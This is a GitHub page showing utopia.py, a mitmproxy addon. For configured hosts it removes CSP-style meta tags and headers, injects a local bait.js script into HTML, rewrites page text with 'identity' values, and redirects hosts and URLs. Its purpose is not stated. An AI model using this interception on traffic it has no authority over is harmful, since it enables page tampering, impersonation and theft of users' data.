-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathutopia.py
167 lines (127 loc) · 4.65 KB
/
utopia.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
import lxml.html
from lxml.html import builder as E
from mitmproxy import http
import fnmatch
import json
import logging
import re
import string
import traceback
from pathlib import Path
# In-memory copy of the JSON configuration; reloaded on change by load_data().
data = {}
# os.stat_result of data.json at last successful load; None until first load.
# Used as a cheap mtime+size change detector.
data_stats = None
# Directory containing this script; config is resolved relative to it.
cdir = Path(__file__).parent
# Path to the JSON configuration file driving all interception rules.
data_path = cdir / "data.json"
logger = logging.getLogger(__name__)
def load_data():
    """Reload the global ``data`` config from data.json if it changed on disk.

    Change detection is a cheap mtime+size comparison against the stats
    recorded at the last successful load. On a JSON decode error the
    previous config is kept and a warning is logged. A missing or
    unreadable data.json is logged and tolerated (previous config kept)
    instead of crashing the proxy hook.
    """
    global data, data_stats
    try:
        current_stats = data_path.stat()
    except OSError:
        # data.json missing/unreadable — keep whatever config we already have.
        logger.warning("cannot stat %s; keeping previous config", data_path)
        return
    if data_stats is not None and (
        current_stats.st_mtime == data_stats.st_mtime
        and current_stats.st_size == data_stats.st_size
    ):
        # Unchanged since last load — nothing to do.
        return
    try:
        data = json.loads(data_path.read_text())
        data_stats = current_stats
    except json.JSONDecodeError:
        logger.warning("Chyba dekodovania dat")
def recurse_json(data, replace_data):
    """Return a deep copy of *data* with every string swapped via *replace_data*.

    Recurses through lists and dicts; a string that appears as a key in
    *replace_data* is replaced by its mapped value, any other value is
    returned unchanged. Dict keys are preserved as-is (only values recurse).

    Fixes two bugs in the original: ``changed.append(recurse_json(x), replace_data)``
    passed two arguments to ``list.append`` (TypeError on any list), and the
    dict branch built its result but never returned it (returned None).
    """
    if isinstance(data, list):
        return [recurse_json(item, replace_data) for item in data]
    if isinstance(data, dict):
        return {key: recurse_json(val, replace_data) for key, val in data.items()}
    if isinstance(data, str):
        return replace_data.get(data, data)
    # Numbers, bools, None, etc. pass through untouched.
    return data
def response(flow: http.HTTPFlow) -> None:
    """mitmproxy response hook: rewrite headers and bodies per the config.

    Order of operations (driven by the global ``data`` config):
      1. add ``add_headers`` and strip ``remove_headers`` from every response;
      2. fnmatch the URL against ``redirects`` and answer with a 302 on match;
      3. only for hosts in ``intercepted_hosts`` (and not ``api*`` hosts),
         inject bait.js into HTML and apply string replacements to HTML/JS.
    """
    if not flow.response:
        return
    flow.response.headers.update(data.get("add_headers", {}))
    removable = data.get("remove_headers", [])
    # Snapshot keys: we delete from the mapping while walking it.
    for header in tuple(flow.response.headers.keys()):
        if header.lower() in removable:
            del flow.response.headers[header]
    for pattern, target in data.get("redirects", {}).items():
        if fnmatch.fnmatch(flow.request.url, pattern):
            flow.response.status_code = 302
            flow.response.headers["Location"] = target
            return
    for suffix in data.get("intercepted_hosts", []):
        if flow.request.pretty_host.endswith(suffix):
            break
    else:
        return
    if flow.request.pretty_host.startswith("api"):
        return
    # Classify by scanning header values, as the original did (any header
    # value containing the MIME string counts, not just Content-Type).
    is_html = False
    is_js = False
    for _, value in flow.response.headers.items():
        lowered = value.lower()
        if "text/html" in lowered:
            is_html = True
            break
        elif "application/javascript" in lowered:
            is_js = True
            break
    if not (is_html or is_js):
        return
    # BUGFIX: copy before update — the original mutated the shared
    # "replace_global" dict inside the global config, so per-host
    # replacements leaked into every subsequent request.
    to_replace = dict(data.get("replace_global", {}))
    to_replace.update(data.get("replace_hosts", {}).get(flow.request.host, {}))
    txt = flow.response.text
    if is_html:
        try:
            tree = lxml.html.fromstring(txt)
            # Drop http-equiv metas (e.g. refresh/CSP) that could interfere.
            for elem in tree.xpath(".//meta"):
                if elem.get("http-equiv"):
                    elem.getparent().remove(elem)
            for elem in tree.xpath(".//body"):
                # Resolve bait.js next to this script (consistent with
                # data.json) and avoid leaking a file handle.
                js_content = (cdir / "bait.js").read_text()
                injector = E.SCRIPT(js_content)
                elem.getparent().insert(0, injector)
                break
            txt = lxml.html.tostring(tree).decode()
        except Exception:
            # Narrowed from a bare except: (which also swallowed
            # KeyboardInterrupt/SystemExit); best-effort injection.
            print("XML parser error in " + flow.request.url)
            traceback.print_exc()
    for key, value in to_replace.items():
        # Replacement values may reference $identity placeholders.
        value = string.Template(value).safe_substitute(data.get("identity", {}))
        txt = txt.replace(key, value)
    flow.response.text = txt
    logger.info(f"intercepting html `{flow.request.url}`")
def request(flow: http.HTTPFlow) -> None:
    """mitmproxy request hook: CORS preflight, host redirects, URL rewrites.

    Reloads the config, short-circuits OPTIONS with a permissive CORS
    response, and — for hosts in ``intercepted_hosts`` only — marks the
    flow, swaps the upstream host per ``redirect_hosts``, and rewrites the
    URL by the first matching ``path_replace_hosts`` regex (regex groups
    are exposed to the template as $regex0, $regex1, ...).
    """
    load_data()
    host = flow.request.pretty_host
    # Automatically add and respond to CORS preflight requests.
    if flow.request.method == "OPTIONS":
        flow.response = http.Response.make(
            200,
            b"",
            {
                "Access-Control-Allow-Origin": "*",
                "Access-Control-Allow-Methods": "GET,POST,PUT,DELETE",
                "Access-Control-Allow-Headers": "*",
                "Access-Control-Max-Age": "1728000",
            },
        )
        return
    for suffix in data.get("intercepted_hosts", []):
        if host.endswith(suffix):
            break
    else:
        return
    if flow.websocket:
        return
    flow.request.marker = ":mage_man:"
    redir_host = data.get("redirect_hosts", {}).get(host)
    if redir_host:
        flow.request.host = redir_host
    for pattern, dest in data.get("path_replace_hosts", {}).items():
        # flow.request.url is already a str; dropped the redundant str().
        match = re.match(pattern, flow.request.url)
        if match is None:
            continue
        groups = {f"regex{idx}": group for idx, group in enumerate(match.groups())}
        flow.request.url = string.Template(dest).safe_substitute(groups)
        # Lazy %-formatting so the message is only built if INFO is enabled.
        logger.info("Rewriting url to: %s", flow.request.url)
        break
    # Removed the original trailing `if flow.request.url.endswith(".js"): return`
    # — it was the last statement of the function, so it had no effect.